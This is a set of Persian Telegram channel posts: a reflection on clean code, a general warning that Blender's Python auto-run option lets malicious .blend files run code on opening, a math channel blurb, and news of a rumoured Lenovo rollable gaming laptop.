بیزنس می‌خواد زنده بمونه، برنامه‌نویس می‌خواد سیستم نخوابه. نه سرعت بدون فکر جواب میده، نه وسواس بیش از حد. کدی که نشه راحت تغییرش داد، بیزنس رو کند می‌کنه. بیزنسی هم که به کد اهمیت نده، بعداً هزینه‌شو میده.

🤔 پس بی‌خیال کد تمیز بشیم؟ نه.

ولی واقع‌بین باشیم. کد تمیز یه مقصد نیست، یه تعهده. تعهد به تیم، به خودِ چند ماه بعدمون، و به پروژه‌ای که قراره زنده بمونه. نه وسواس، نه شل‌گیری. فقط مسئولیت.

🔗 برای نوشتن این پست از این منبع خیلی الهام گرفته شده:
https://dev.to/sylwia-lask/nobody-writes-clean-code-we-all-just-pretend-11d1

—-

💡 مثل همیشه کنجکاو بمونید :)

🆔 @MdDaily
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ایمن نوشت
‏درس بزرگ برای همه کاربران نرم‌افزارهای تخصصی: امنیت فقط فیشینگ نیست!

نرم‌افزار محبوب بلندر (Blender) یک نرم‌افزار رایگان و بازمتن مشهور برای مدل‌سازی و ساخت انیمیشن است. این نرم‌افزار گزینه‌ای به نام Auto Run Python Scripts برای اجرای خودکار کدهای زبان پایتون دارد. این قابلیت به هنرمندان اجازه می‌دهد بعضی کارهای تکراری را خودکار پیش ببرند.

شما وسط یک پروژه سنگین هستید، زمان کم دارید و ناگهان در یک سایت اینترنتی، مدلی سه‌بعدی و فوق‌العاده پیدا می‌کنید که «رایگان» هم است. با خوشحالی دانلودش می‌کنید تا پروژه‌ شما سریع‌تر پیش برود. اما هکرها دقیقا برای همین لحظه برنامه‌ریزی کرده‌اند و فایلی را وارد سیستم می‌کنند که زندگی‌ دیجیتال‌تان را به باد می‌دهد!

حالا مشکل کجاست؟ اگر این گزینه در تنظیمات روشن باشد (که خیلی‌ها برای راحتی کار آن را روشن نگه می‌دارند)، به محض باز کردن فایلی که پسوند «blend.» دارد، کدهای درون فایل بدون هیچ سوالی اجرا می‌شوند. هکرها هم از همین «ویژگی» سوءاستفاده می‌کنند و حتی نیازی به سوء استفاده از هیچ آسیب‌پذیری و باگی ندارند!


🌐 @ImenNevesht
❗️کانال اطلاع رسانی امنیت و تکنولوژی
👍1
🔴 🔅 ⚙️

Decoded رمزگشایی


هنر ریاضیات

بازی/سرگرمی/شطرنج/علاقه/گفتگو/زبان نوابغ

بیچاره شاگردی که از استادش بهتر نشود .
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from شهر سخت افزار
🔷 اطلاعات تازه از لپ‌تاپ رول شونده لنوو: یک غول واقعی با RTX 5090

🔻چند روز قبل گزارش‌هایی منتشر شد که حاکی از آن بود که لنوو در حال آماده‌سازی یک لپ‌تاپ بسیار غیرمعمول با نام Legion Pro Rollable است؛ دستگاهی که نمایشگر معمولی 16 اینچی با نسبت تصویر 16:9 آن به صورت افقی باز شده و در نهایت به یک لپ‌تاپ 24 اینچی اولتراواید با نسبت تصویر 21:9 تبدیل میگردد.

🔻بر اساس مشخصات به روز شده، طراحی این مدل در اصل بر پایه Legion Pro 7i خواهد بود، اما با بدنه‌ای کاملاً جدید که برای مکانیزم رول شونده بازطراحی شده است.

🔻لپ‌تاپ Legion Pro Rollable قرار است به کارت گرافیک GeForce RTX 5090 لپتاپی از انویدیا مجهز شده و در کنار آن هم از یک پردازنده رده بالای Intel Core Ultra در بالاترین پیکربندی ممکن استفاده شود.

🌐جزئیات بیشتر در رابطه با این غول گیمینگ

🆔 @ShahrSakhtAfzar